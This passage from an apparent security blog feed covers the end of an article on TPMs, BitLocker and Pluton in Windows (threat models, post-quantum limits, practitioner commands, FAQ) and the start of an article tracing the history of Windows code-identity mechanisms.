&lt;p&gt;The complexity of guessing an $n$-digit PIN against intact anti-hammering [@ms-learn-bitlocker-countermeasures] with a per-failure delay $\Delta t$ is approximately $\frac{1}{2} \cdot 10^n \cdot \Delta t$ in the average case. For $n = 8$ and $\Delta t \geq 1\text{s}$ this is roughly $5 \times 10^7$ seconds, or about 1.6 years. For $n = 4$, it is hours.&lt;/p&gt;

CVE-2023-21563 [@cve-2023-21563] -- the BitLocker Security Feature Bypass that the offensive-security community calls &quot;Bitpixie&quot; -- is a useful reminder that breaking BitLocker does not require breaking the TPM. The NVD entry reads simply &quot;BitLocker Security Feature Bypass Vulnerability,&quot; and the bypass operates against the boot path that consumes the unsealed VMK, not against the chip that sealed it. (NVD does not use the &quot;Bitpixie&quot; name; it is community-known-as.)
&lt;h3&gt;7.3 Once a key is unsealed, it lives in the OS&apos;s address space&lt;/h3&gt;
&lt;p&gt;A runtime-compromised OS reads any key the TPM has unsealed for it. The TPM defends against the &lt;em&gt;offline&lt;/em&gt; attacker (disk theft, post-shutdown tamper) and the &lt;em&gt;pre-OS&lt;/em&gt; attacker (boot-time integrity violation that fails the unseal). It does not defend against a privileged runtime attacker. This is a general impossibility, not a TPM weakness; no passive cryptoprocessor can decide whether the OS asking to unseal a key is itself trustworthy at the moment it asks.&lt;/p&gt;
&lt;p&gt;This is why VBS, Credential Guard, and DRTM exist as separate disciplines: they answer &quot;what protects the unsealed key once it is in RAM?&quot; by isolating the key inside a VTL1 enclave or by re-measuring the OS after launch. The TPM is a participant; it is not the answer.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The TPM defends against the offline attacker and the pre-OS attacker. It does not defend against a runtime-compromised OS. This is by design, and is the most a passive cryptoprocessor can do. Stronger guarantees require an active component (DRTM, VBS, hypervisor isolation) -- and none of those are the TPM.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What would an &lt;em&gt;ideal&lt;/em&gt; TPM look like? On-die (no bus), in an isolated TEE shared with nothing else, with the host-firmware-update path replaced by an OS-channel update path, with high-assurance certification depth, with an authenticated wire protocol always on, and with native support for post-quantum primitives. &lt;em&gt;No shipping TPM today satisfies all six properties.&lt;/em&gt; Pluton plus future PQC firmware updates is the closest existing trajectory; it is on-die, isolated, OS-channel-updated, and Rust-implemented, but it does not yet expose PQC primitives and its certification depth is still evolving.&lt;/p&gt;
&lt;p&gt;If the TPM cannot defeat a runtime-compromised OS by design, and the best fTPM can be extracted in three hours, where is the security frontier actually moving?&lt;/p&gt;
&lt;h2&gt;8. Open problems: PQC, supply chain, and trust centralization&lt;/h2&gt;
&lt;p&gt;On August 13, 2024, NIST finalized FIPS 203 (ML-KEM) [@nist-fips-203-mlkem], FIPS 204 (ML-DSA) [@nist-fips-204-mldsa], and FIPS 205 (SLH-DSA) [@nist-fips-205-slhdsa] -- the first federal post-quantum cryptography standards. ML-DSA-87&apos;s public keys are 2,592 bytes. A typical TPM has 6 to 32 KiB of NV memory total. The math gets uncomfortable quickly.&lt;/p&gt;
&lt;h3&gt;8.1 Post-quantum migration&lt;/h3&gt;
&lt;p&gt;The NIST Post-Quantum Cryptography project page [@nist-pqc-project] describes the timeline: &quot;In August 2024, NIST released its principal PQC standards ... Under the transition timeline in NIST IR 8547, NIST will deprecate and ultimately remove quantum-vulnerable algorithms from its standards by 2035, with high-risk systems transitioning much earlier.&quot; That is the deadline driving every TPM roadmap, and the August 14, 2024 Federal Register notice [@federal-register-2024-fips-pqc] made it formal U.S. policy.&lt;/p&gt;
&lt;p&gt;Three concrete obstacles. &lt;strong&gt;First&lt;/strong&gt;, the TCG algorithm registry has not yet normatively added ML-KEM, ML-DSA, or SLH-DSA; a TCG PQC working group exists, but its output is in flight. The Microsoft TPM 2.0 reference code [@ms-tpm-20-ref-releases] tracks TCG: the V1.83 release notes describe it as &quot;the first revision in sync with Trusted Computing Group 1.83,&quot; and that revision still does not expose PQC algorithm IDs. The Fraunhofer SIT Post-Quantum Cryptography for TPM [@fraunhofer-pqc-tpm] programme has prototyped PQC primitives inside reference TPM stacks, but those changes are research artefacts, not normative TCG output.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Second&lt;/strong&gt;, the constrained NV-memory budget on a typical TPM cannot hold many simultaneous PQC keys at the larger parameter sets. Quick arithmetic against ML-DSA-87 (FIPS 204): 2,592-byte public key plus 4,896-byte private key plus protocol overhead pushes a single persistent key blob past 7.5 KiB. A 16-KiB-NV TPM can hold at most two persistent ML-DSA-87 slots before exhausting NV. The larger SLH-DSA-256s signatures (29,792 bytes per FIPS 205 Table 2) [@nist-fips-205-slhdsa] routinely exceed the typical 1-4 KiB response-buffer cap (&lt;code&gt;TPM_PT_MAX_RESPONSE_SIZE&lt;/code&gt; in the PC Client Platform TPM Profile [@tcg-pc-client-ptp-spec]); the related &lt;code&gt;TPM_PT_NV_BUFFER_MAX&lt;/code&gt; (the maximum NV read/write chunk) is in the same order of magnitude and complicates persistent-storage cases as well. The chip cannot return such a signature in a single command without fragmentation extensions. PQC support on commodity TPMs is not just a software upgrade; it is an NV-budget renegotiation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Third&lt;/strong&gt;, hybrid signing schemes (composite RSA + ML-DSA, or ECDSA + ML-DSA) are well-defined for transitional certificates. The IETF LAMPS WG draft on composite ML-DSA signatures [@ietf-lamps-pq-composite-sigs] specifies &quot;combinations of US NIST Module-Lattice-Based Digital Signature Algorithm (ML-DSA) in hybrid with traditional algorithms RSASSA-PKCS1-v1.5, RSASSA-PSS, ECDSA, Ed25519, and Ed448&quot; for X.509 PKIX. The TLS hybrid key-exchange draft [@ietf-tls-hybrid-design] does the same for TLS 1.3 handshakes. Neither defines a hybrid &lt;code&gt;TPM2_Sign&lt;/code&gt; profile, and no shipping Windows TPM exposes one.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s Quantum Safe Security blog (August 2025) [@ms-quantum-safe-2025] describes the broader effort -- &quot;Our PQC effort began in 2014 when we published research on post-quantum algorithms ... We participated in four submissions to the original 2017 NIST PQC call and one submission to the current call&quot; -- but is silent on Pluton-firmware PQC support specifically.&lt;/p&gt;
&lt;p&gt;The architectural punchline: Pluton&apos;s Windows-Update firmware delivery channel is the only realization that can plausibly add a PQC primitive across the deployed fleet without a hardware refresh. Every other realization will need new silicon to ship native PQC.&lt;/p&gt;
&lt;h3&gt;8.2 The supply-chain trust of EK certificates&lt;/h3&gt;
&lt;p&gt;The Microsoft TPM key attestation documentation [@ms-learn-tpm-key-attestation] describes the trust-chain assumption plainly: the requestor proves &quot;to a CA that the RSA key in the certificate request is protected by either &apos;a&apos; or &apos;the&apos; TPM that the CA trusts.&quot; That trust is anchored on the EK certificate the chip&apos;s vendor issued at manufacture. A vendor-CA compromise therefore equals collapse of TPM-bound device identity for an entire OEM cohort.&lt;/p&gt;
&lt;p&gt;The 2017 ROCA incident is the canonical event for why this matters. In February 2017, Matúš Nemec, Marek Sýs, Petr Švenda, Dušan Klinec, and Vashek Matyáš at Masaryk University [@crocs-muni-roca] disclosed to Infineon a flaw in its RSA key-generation library that drastically reduced the entropy of generated keys and made factoring tractable. The NVD entry for CVE-2017-15361 [@cve-2017-15361] is precise about scope: &quot;The Infineon RSA library 1.02.013 in Infineon Trusted Platform Module (TPM) firmware ... mishandles RSA key generation, which makes it easier for attackers to defeat various cryptographic protection mechanisms via targeted attacks, aka ROCA. Examples of affected technologies include BitLocker with TPM 1.2, YubiKey 4 (before 4.3.5) PGP key generation, and the Cached User Data encryption feature in Chrome OS.&quot; The Wikipedia summary [@wikipedia-roca] reports the team&apos;s own estimate that the bug &quot;affected around one-quarter of all current TPM devices globally.&quot;&lt;/p&gt;
&lt;p&gt;The Estonian e-ID program -- about 750,000 cards issued since 2014 [@arstechnica-2017-roca-estonia], all using the affected Infineon chip -- had to be re-enrolled. Microsoft published advisory ADV170012 [@msrc-adv170012] on the same coordinated disclosure date. There is still no scalable revocation mechanism for individual EK certificates: vendor-level revocation breaks every device whose EKpub was issued by that vendor&apos;s CA, and ADCS-template OEM-pinning limits scope but does not solve in-scope CA compromise. Pluton centralizes one part of trust (Microsoft as firmware signer); EK certificate issuance for the silicon is unchanged, and supply-chain integrity remains a per-vendor question.&lt;/p&gt;
&lt;h3&gt;8.3 Attestation freshness in zero-trust networks&lt;/h3&gt;
&lt;p&gt;A TPM Quote proves &quot;this device booted clean,&quot; not &quot;this device is currently clean.&quot; Microsoft Intune&apos;s default device-compliance check-in is on the order of hours; Microsoft Entra&apos;s Continuous Access Evaluation documentation [@ms-learn-cae] specifies the upper-bound numerics: &quot;By default, access tokens are valid for one hour ... The goal for critical event evaluation is for response to be near real time, but latency of up to 15 minutes might be observed because of event propagation time.&quot;&lt;/p&gt;
&lt;p&gt;A 15-minute revocation window for critical events is good. But it propagates &lt;em&gt;signed&lt;/em&gt; policy decisions, not fresh TPM measurements. A device that was clean at boot, was compromised five minutes ago, and just made a request now will pass CAE if its existing access token is valid. Closing that window requires either much shorter token lifetimes, runtime attestation (TCG DICE, Project Cerberus), or a hypervisor-mediated re-measurement -- and none of them are the TPM.&lt;/p&gt;
&lt;p&gt;DPAPI-NG, the CNG-layer successor to classic DPAPI that Windows uses to encrypt secrets to a set of authorization principals, is a useful test case. The DPAPI-NG documentation [@ms-learn-cng-dpapi] describes the API as &quot;secure[ly] shar[ing] secrets (keys, passwords, key material) and messages by protecting them to a set of principals.&quot; The protection-descriptor grammar [@ms-learn-protection-descriptors] permits five descriptor keywords -- &lt;code&gt;SID&lt;/code&gt;, &lt;code&gt;SDDL&lt;/code&gt;, &lt;code&gt;LOCAL&lt;/code&gt;, &lt;code&gt;WEBCREDENTIALS&lt;/code&gt;, &lt;code&gt;CERTIFICATE&lt;/code&gt; -- across three logical authorization classes (AD-forest groups, web credentials, certificate-store entries). Notably absent: any literal &lt;code&gt;TPM=true&lt;/code&gt; clause. DPAPI-NG can be backed by a TPM-bound CNG key, but the &lt;em&gt;authorization&lt;/em&gt; is expressed in principal terms, not in TPM terms. The TPM is a key-residence property, not a policy primitive at this layer -- the right architectural choice, but it means TPM-bound DPAPI-NG inherits the freshness limits of whatever principal authorization decides who is currently authorized.&lt;/p&gt;
&lt;h3&gt;8.4 The Pluton political question&lt;/h3&gt;
&lt;p&gt;Centralizing firmware on a single Microsoft signing key is a deliberate trade-off, not an oversight. The benefit is the patch path: a Pluton firmware vulnerability becomes a Windows Update release rather than a multi-quarter OEM capsule rollout. The cost is that the chip&apos;s trust anchor is now a Microsoft signing key, in a way that even the most conservative dTPM is not. The market response in 2022 was openly mixed.&lt;/p&gt;
&lt;p&gt;In March 2022, The Register obtained vendor statements [@register-2022-pluton] from Dell, Lenovo, and HP. Dell&apos;s reply was unusually direct: &quot;Pluton does not align with Dell&apos;s approach to hardware security and our most secure commercial PC requirements.&quot; Lenovo deployed the chip but disabled it: &quot;[ThinkPads] will not support Microsoft Pluton at launch ... But ThinkPads introduced in January with AMD Ryzen 6000 processors will include Pluton as it&apos;s present in those AMD chips, though the feature will be disabled by default. AMD has provided an option for users to turn the feature on and off.&quot; PCWorld followed up [@pcworld-2022-pluton] with Lenovo&apos;s articulated reasoning: &quot;Pluton is disabled by default on 2022 Lenovo ThinkPad laptops using AMD Ryzen PRO 6000 Series processors because that&apos;s what Lenovo customers have asked for, the choice to enable or not.&quot;&lt;/p&gt;
&lt;p&gt;Matthew Garrett -- who later contributed the upstream Linux kernel support for the Pluton TPM CRB interface in Linux 6.3 (merged February 2023, released April 2023) [@phoronix-2023-pluton-linux63] -- published the closest thing to a public engineering analysis of Pluton&apos;s controllability. His April 2022 reverse-engineering write-up [@garrett-2022-pluton-rev] of the ASUS ROG Zephyrus G14 BIOS documents two firmware-level disable mechanisms on AMD Ryzen 6000 platforms: an x86-firmware &quot;do not communicate&quot; toggle, and a PSP directory entry 0xB BIT36 soft-fuse that &quot;will NOT put HSP hardware in disable state, to disable HSP hardware, you need setup PSP directory entry 0xB, BIT36 to 1.&quot; Garrett&apos;s caveat is honest: &quot;My interpretation of this is that it doesn&apos;t directly influence Pluton, but disables all mechanisms that would allow the OS to communicate with it.&quot; It is not a multi-signer proposal. There is no public peer-reviewed proposal for multi-signer or open-source Pluton firmware.&lt;/p&gt;
&lt;p&gt;The unresolved engineering question: whether a multi-signer model is feasible without losing the timely-update property that motivated Pluton in the first place. The answer is genuinely unknown. The political question -- whether one signing key on the world&apos;s PC fleet is the right cost for the Windows-Update patch latency it enables -- is no longer a technical argument. It is a procurement-policy and procurement-jurisdiction argument, and high-assurance fleets are deciding both ways.&lt;/p&gt;
&lt;p&gt;The TPM was supposed to be the part of the system you didn&apos;t have to trust anyone for. Twenty-five years later, the trust question is back -- and the answer is now political.&lt;/p&gt;
&lt;h2&gt;9. A Windows practitioner&apos;s TPM reference&lt;/h2&gt;
&lt;p&gt;What does this mean for the engineer running &lt;code&gt;Get-Tpm&lt;/code&gt; on Monday morning? Three concrete things: discovery, choosing a form factor, and avoiding the pitfalls.&lt;/p&gt;
&lt;h3&gt;9.1 Discovery&lt;/h3&gt;
&lt;p&gt;Three commands establish ground truth on any Windows 11 device. &lt;code&gt;Get-Tpm&lt;/code&gt; returns presence, ownership, and command-availability state. &lt;code&gt;Get-TpmEndorsementKeyInfo&lt;/code&gt; returns the EK public and certificate. &lt;code&gt;tpm.msc&lt;/code&gt; opens the Microsoft Management Console snap-in. The TCG event log lives at &lt;code&gt;C:\Windows\Logs\MeasuredBoot\*.log&lt;/code&gt; and contains the per-PCR measurement history for every boot. Microsoft&apos;s BitLocker page [@ms-learn-bitlocker] documents the protector model that pairs with the TPM state.&lt;/p&gt;
&lt;p&gt;{`
// Demonstrates the logic of:
//   Get-Tpm
//   (Get-BitLockerVolume -MountPoint &apos;C:&apos;).KeyProtector
//
// Mirrors the PowerShell decision tree without requiring a real TPM.&lt;/p&gt;
&lt;p&gt;const tpm = {
  TpmPresent: true,
  TpmReady: true,
  ManufacturerVersion: &apos;7.2.0.1&apos;,
  PhysicalPresenceVersionInfo: &apos;1.3&apos;,
};&lt;/p&gt;
&lt;p&gt;// Sample KeyProtector list as PowerShell would return it.
const protectors = [
  { KeyProtectorType: &apos;Tpm&apos; },
  { KeyProtectorType: &apos;RecoveryPassword&apos; },
  // Uncomment to model TPM+PIN:
  // { KeyProtectorType: &apos;TpmPin&apos; },
];&lt;/p&gt;
&lt;p&gt;function classify(tpm, protectors) {
  if (!tpm.TpmPresent) return &apos;no-tpm&apos;;
  if (!tpm.TpmReady) return &apos;tpm-not-ready&apos;;&lt;/p&gt;
&lt;p&gt;  const types = protectors.map(p =&amp;gt; p.KeyProtectorType);
  const hasPin = types.includes(&apos;TpmPin&apos;) || types.includes(&apos;TpmPinStartupKey&apos;);
  const hasStartupKey = types.includes(&apos;TpmStartupKey&apos;);
  const hasRecovery = types.includes(&apos;RecoveryPassword&apos;);&lt;/p&gt;
&lt;p&gt;  if (hasPin) return &apos;tpm-plus-pin&apos;;
  if (hasStartupKey) return &apos;tpm-plus-startup-key&apos;;
  if (types.includes(&apos;Tpm&apos;)) return &apos;tpm-only&apos;;
  return &apos;no-tpm-protector&apos;;
}&lt;/p&gt;
&lt;p&gt;const verdict = classify(tpm, protectors);
console.log(&apos;TPM present:&apos;, tpm.TpmPresent);
console.log(&apos;TPM ready  :&apos;, tpm.TpmReady);
console.log(&apos;Configuration:&apos;, verdict);
if (verdict === &apos;tpm-only&apos;) {
  console.log(&apos;WARN: TPM-only is vulnerable to bus-sniffing on dTPM.&apos;);
  console.log(&apos;Mitigation: enable TPM+PIN with PIN length &amp;gt;= 8.&apos;);
}
console.log(&apos;Recovery key escrowed:&apos;, protectors.some(p =&amp;gt; p.KeyProtectorType === &apos;RecoveryPassword&apos;));
`}&lt;/p&gt;
&lt;h3&gt;9.2 Choosing a TPM form when the OEM gives you a choice&lt;/h3&gt;
&lt;p&gt;A short decision tree, distilled from the SOTA analysis above:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Opportunistic theft, low-skill attacker.&lt;/strong&gt; Default TPM-only is acceptable but not ideal. TPM+PIN with at least 8 random digits closes the bus-sniffing window on dTPM and the low-PIN-entropy window on AMD fTPM.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Determined targeted adversary.&lt;/strong&gt; TPM+PIN is necessary but not sufficient. Add a startup-key factor or Network Unlock where appropriate (BitLocker&apos;s native OS-volume preboot authentication is TPM, TPM+PIN, and startup key, not FIDO2 or smart card), and prefer Pluton or hardened dTPM over commodity AMD fTPM for the device class.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Compliance-driven.&lt;/strong&gt; Discrete TPM with EAL4+ / FIPS 140-2 certification is still the easiest procurement story. Verify the OEM has not enabled &lt;code&gt;Pluton-as-TPM&lt;/code&gt; if the auditor&apos;s checklist requires a discrete chip.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cloud workload.&lt;/strong&gt; Azure Trusted Launch with vTPM [@ms-learn-azure-trusted-launch] is the default for Gen2 VMs and underwrites Confidential VM offerings.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Surface Copilot+, AMD Ryzen 6000+, Intel Core Ultra 200V, Snapdragon X.&lt;/strong&gt; Pluton-as-TPM [@ms-learn-pluton] is the OEM default in many SKUs; verify the Pluton firmware is current via Windows Update.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;9.3 Five common pitfalls&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Clearing the TPM invalidates every TPM-bound protector, so the next boot falls back to the BitLocker recovery key. Always verify recovery key escrow first -- in Microsoft Entra ID for Azure-AD-joined devices, in Active Directory for AD-joined devices, or in a printed/saved location for personal devices. If the recovery key is unescrowed and the TPM is cleared, the volume is unrecoverable.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The other four pitfalls in brief: firmware updates change PCR[0] and PCR[7], so suspend BitLocker before applying them; dual-boot Linux extends PCRs differently than Windows, so PCR-only sealing breaks under it -- escape with TPM+PIN; Windows does not enable parameter encryption on the BitLocker boot path, so the actual mitigation against dTPM bus sniffing is preboot authentication, not &quot;TPM hardening&quot;; and Windows Hello silently falls back to no-TPM credential storage if the TPM is unhealthy, so periodically check &lt;code&gt;Get-Tpm&lt;/code&gt; on enrolled devices.&quot;Anti-hammering&quot; is the persistent rate-limit counter the TPM enforces against authValue and policy-PIN failures. It survives reboots and only resets after a long lockout period.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Group Policy setting &quot;Require additional authentication at startup&quot; with a minimum PIN length of 8 buys you the most security against published attacks for the least operational cost. It defeats Andzakovic-style bus sniffing (the VMK is no longer the only secret on the bus) and forces an attacker on AMD fTPM to either compromise the TPM state out-of-band or guess the PIN against anti-hammering. The exception is a fully-extracted AMD fTPM where faulTPM has already obtained the unsealed material -- in that case the PIN is bypassed.&lt;/p&gt;
&lt;/blockquote&gt;

From an elevated PowerShell prompt:&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;Suspend-BitLocker -MountPoint &quot;C:&quot; -RebootCount 1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;RebootCount 1&lt;/code&gt; argument auto-resumes after the next reboot, which is what you want when the firmware update reboots the device. After the update completes, run &lt;code&gt;Get-BitLockerVolume -MountPoint C:&lt;/code&gt; and confirm &lt;code&gt;ProtectionStatus&lt;/code&gt; is &lt;code&gt;On&lt;/code&gt; again. If you forget, the next boot will land on the BitLocker recovery prompt because PCR[0] no longer matches the sealed policy.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;The TPM does exactly what it was designed to do, no more. Which is exactly enough -- if you understand what &quot;exactly&quot; means.&lt;/p&gt;
&lt;h2&gt;10. FAQ and closing&lt;/h2&gt;
&lt;p&gt;A handful of questions get asked again and again about the TPM. The answers do not always match the marketing.&lt;/p&gt;

No. TPM keys are non-exportable and held inside the chip; the Microsoft documentation [@ms-learn-how-windows-uses-tpm] is explicit that &quot;if a key stored in a TPM has properties that disallow exporting the key, that key truly can&apos;t leave the TPM.&quot; The Endorsement Key is a privacy concern (it uniquely identifies the chip) but it is not a Microsoft backdoor. Pluton centralizes firmware *signing*, not key access -- Microsoft signs the firmware that runs on Pluton, but the keys Pluton creates and seals stay inside Pluton.

Depends on threat model. Against software attackers, fTPM is sufficient -- the no-bus property defeats the cheap LPC/SPI sniffing class. Against well-funded physical attackers, fTPM is weaker than dTPM: TPM-Fail [@tpmfail-microsite] showed timing-side-channel ECDSA key recovery on Intel PTT, and faulTPM [@jacob-2023-faultpm] showed 2-3 hour state extraction on AMD PSP. Pluton sits between the two with a smaller TEE surface but less public scrutiny.

Yes -- Microsoft mandates it. The OEM mandate has been in force since July 28, 2016 [@ms-learn-oem-tpm]; the consumer mandate became visible on June 24, 2021 with the Windows 11 announcement. The defensive primitives the TPM underwrites -- BitLocker, Credential Guard, Windows Hello, Device Health Attestation [@ms-learn-azure-measured-boot] -- are real, measurable, and not realistically replaceable by software-only equivalents.

Practically no for dTPM and Pluton; the EK private key never leaves the chip, and replicating it would require silicon-level extraction that no public attack has achieved. faulTPM [@jacob-2023-faultpm] proved that AMD fTPM internal state can be *extracted* in 2-3 hours of physical access; that is closer to &quot;extracted&quot; than &quot;cloned&quot; but the practical effect is the same for keys the chip held.

Because ransomware operates after the OS has loaded -- by definition outside the TPM&apos;s threat model. The TPM secures keys at rest and attests boot integrity. It does not run anti-malware, sign user files, or detect runtime compromise. Microsoft&apos;s BitLocker countermeasures page [@ms-learn-bitlocker-countermeasures] is explicit that BitLocker is a data-protection feature, not an anti-malware feature; the same logic applies to the TPM that underwrites it.

Pluton implements TPM 2.0 plus Microsoft-specific extensions. From Windows&apos;s perspective it *is* a TPM with a different update story (Windows Update instead of UEFI capsule) and a different trust anchor (Microsoft as firmware signer). Whether the OEM exposes Pluton &quot;as the TPM&quot; or alongside a discrete TPM is an OEM choice [@ms-learn-pluton-as-tpm].
&lt;p&gt;Return to June 24, 2021. The PR backlash about a Trusted Platform Module made the chip visible for the first time to a consumer audience that had owned one for a decade. The technical rationale Microsoft gave was four words long; the actual rationale is the rest of this article.&lt;/p&gt;
&lt;p&gt;A passive cryptoprocessor designed in 1999 quietly became the load-bearing pillar of half of Windows security. Twenty-five years of engineering refined a single primitive -- measure, extend, seal, quote -- into something one chip could underwrite. Twenty-five years of attacks, from a $40 FPGA on an LPC bus to a voltage glitch against the AMD PSP, argued empirically about how passive that chip can be allowed to be. The current state of the art is on the CPU die, in Rust, signed by Microsoft, patched through Windows Update -- and post-quantum migration is the next argument.&lt;/p&gt;
&lt;p&gt;The TPM is not a checkbox. It is the point at which Windows decided integrity must be measurable. It is not a panacea -- the runtime-compromised OS still wins once the key is unsealed -- but it is a primitive, with a clean boundary. Now you know what it can prove, and what it cannot. The chip is the cheapest part of the system. The cost was twenty-five years of getting it right.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;tpm-in-windows&quot; keyTerms={[
  { term: &quot;TPM (Trusted Platform Module)&quot;, definition: &quot;A passive cryptoprocessor on a separate chip or block of silicon that holds keys and records integrity measurements.&quot; },
  { term: &quot;PCR (Platform Configuration Register)&quot;, definition: &quot;A TPM register modified only by one-way extend operations, which fold a measurement into the running hash.&quot; },
  { term: &quot;Sealing&quot;, definition: &quot;Encrypting a blob under the TPM with a policy that names a specific PCR state; unseal succeeds only when the live PCRs match.&quot; },
  { term: &quot;Quote&quot;, definition: &quot;A TPM-signed snapshot of selected PCRs, used by remote verifiers in attestation.&quot; },
  { term: &quot;Endorsement Key (EK)&quot;, definition: &quot;The TPM&apos;s permanent identity key, generated at manufacture and certified by the chip vendor&apos;s CA.&quot; },
  { term: &quot;Enhanced Authorization&quot;, definition: &quot;TPM 2.0&apos;s policy-session mechanism, which lets a callable&apos;s authorization rule be an arbitrary composition of PCR, signed, and command-code predicates.&quot; },
  { term: &quot;Algorithm agility&quot;, definition: &quot;The architectural property of TPM 2.0 that decouples cryptographic algorithms from data-structure layout, allowing new algorithms to be added by registering an identifier rather than re-laying out the spec.&quot; },
  { term: &quot;fTPM (firmware TPM)&quot;, definition: &quot;A TPM 2.0 implementation running inside an existing TEE: Intel CSME (PTT), AMD PSP, or Microsoft Pluton.&quot; },
  { term: &quot;DRTM (Dynamic Root of Trust for Measurement)&quot;, definition: &quot;A late-launch boot mechanism (Intel TXT, AMD SVM-SKINIT, System Guard Secure Launch) that re-establishes a known good measurement chain after the OS has started, complementing the TPM&apos;s static RTM.&quot; },
  { term: &quot;Anti-hammering&quot;, definition: &quot;A persistent TPM-enforced rate-limit counter against repeated authValue or PIN failures; survives reboots and forces lockout after a configurable threshold.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>tpm</category><category>windows-security</category><category>bitlocker</category><category>pluton</category><category>hardware-security</category><category>measured-boot</category><category>post-quantum-cryptography</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>&quot;Who Is This Code?&quot; -- The Quiet 33-Year Reinvention of App Identity in Windows</title><link>https://paragmali.com/blog/windows-app-identity-33-year-reinvention/</link><guid isPermaLink="true">https://paragmali.com/blog/windows-app-identity-33-year-reinvention/</guid><description>NT 3.1 could prove which user typed at the keyboard but had no answer to which code was running. Eight successive primitives later, Windows is still answering the same question.</description><pubDate>Fri, 08 May 2026 00:00:00 GMT</pubDate><content:encoded>
Windows NT 3.1 (1993) could prove which **user** typed at the keyboard but had no answer to **which code was running**. Over the next thirty-three years, eight successive primitives -- Authenticode, Kernel-Mode Code Signing, Protected Process Light, AppContainer with the Package SID, App Control for Business, Mark of the Web with SmartScreen, the Vulnerable Driver Block List, and Pluton-rooted attestation -- accreted into a single layered code-identity stack. Each was forced into existence by a specific, named failure of the one before it. This is that story, told as one system.
&lt;h2&gt;Two identities, one operating system&lt;/h2&gt;
&lt;p&gt;On July 27, 1993 -- the day Windows NT 3.1 shipped -- the new operating system could prove with cryptographic precision who Alice was, which group she belonged to, which file she was allowed to open, and at what level of privilege she was running. It could prove exactly nothing about the program she had just double-clicked.&lt;/p&gt;
&lt;p&gt;Thirty-three years later, &quot;Alice&quot; has barely changed. The code she runs has acquired a publisher signature stamped onto its Portable Executable file, a kernel-loader gate that refuses to load unsigned drivers, a signer level in a runtime lattice that decides whether one process can read another&apos;s memory, a Package SID derived from a Crockford-Base32 hash of the manifest publisher [@ms-package-identity], a publisher-rule entry in a centrally managed App Control policy [@ms-appcontrol], a Mark-of-the-Web alternate data stream from the browser that downloaded it [@ms-fscc-motw], a SmartScreen reputation score [@learn-smartscreen], a possible entry on a Microsoft-curated denylist that overrides its own valid signature [@msft-driver-blocklist], and -- on a Pluton-equipped 2026 laptop -- a hardware-attested measurement of the boot chain that loaded it [@learn-pluton]. Every one of those identities was forced into existence by a specific failure of the one before. This is that story.&lt;/p&gt;
&lt;p&gt;A modern symptom makes the asymmetry concrete. In April 2026, attackers seized the publishing pipeline for the &lt;code&gt;@bitwarden/cli&lt;/code&gt; npm package -- a credential they had no business holding -- and shipped a backdoored release for ninety-three minutes before maintainers caught it [@bitwarden-statement]. Code identity, as it existed at every layer of every operating system that consumed that package, said the artifact was authentic. The signature was valid. The publisher&apos;s account was real. The package metadata was correct. Every check passed. &lt;em&gt;And the binary was hostile.&lt;/em&gt; That gap, between &quot;who shipped it&quot; and &quot;is it safe to run,&quot; is the same gap NT 3.1 first stepped over in 1993 and that Windows has been trying to close ever since.&lt;/p&gt;
&lt;p&gt;The Bitwarden case sits in a long company. Stuxnet&apos;s stolen Realtek and JMicron driver-signing keys (2010) [@symantec-stuxnet], Flame&apos;s MD5 collision against Microsoft&apos;s own intermediate CAs (2012) [@ms-2718704], the ASUS ShadowHammer pipeline compromise (operation 2018, disclosed 2019) [@securelist-shadowhammer], every &quot;Bring Your Own Vulnerable Driver&quot; rootkit since 2018 -- they all have the same shape. A valid Windows-anchored signature, on code the publisher did not intend to ship, on a machine that loaded it without complaint.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Every Windows code-identity primitive introduced since 1996 was forced into existence by a specific failure of the layer before it. The article&apos;s spine is that cascade.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The pieces in 2026 are not a feature checklist. They are a layered system, each layer answering a question its predecessor structurally could not. If you read the Microsoft Learn pages one at a time you see eight unrelated products. If you read them in the order their failures forced them into existence, you see one operating system slowly learning to name the code it runs.&lt;/p&gt;

timeline
    title Windows code identity, 1993 to 2026
    1993 : NT 3.1 ships : user-only principal
    1996 : Authenticode : publisher signature on PE
    2002 : Trustworthy Computing memo : SDL forcing function
    2006 : Vista x64 KMCS : refusal of unsigned kernel code
    2010 : Stuxnet : stolen Realtek + JMicron keys
    2012 : AppContainer : per-app SID
    2012 : Flame : MD5 collision against MS CA
    2013 : Windows 8.1 PPL : signer level as runtime ACL
    2015 : Device Guard / WDAC : publisher policy
    2019 : ASUS ShadowHammer disclosed : compromised pipeline (2018 operation)
    2020 : Pluton announced : in-die security processor
    2022 : Driver Block List default-on : signed != trusted
    2024 : CrowdStrike outage : placement is identity
    2025 : MVI 3.0 user-mode preview : kernel/user split
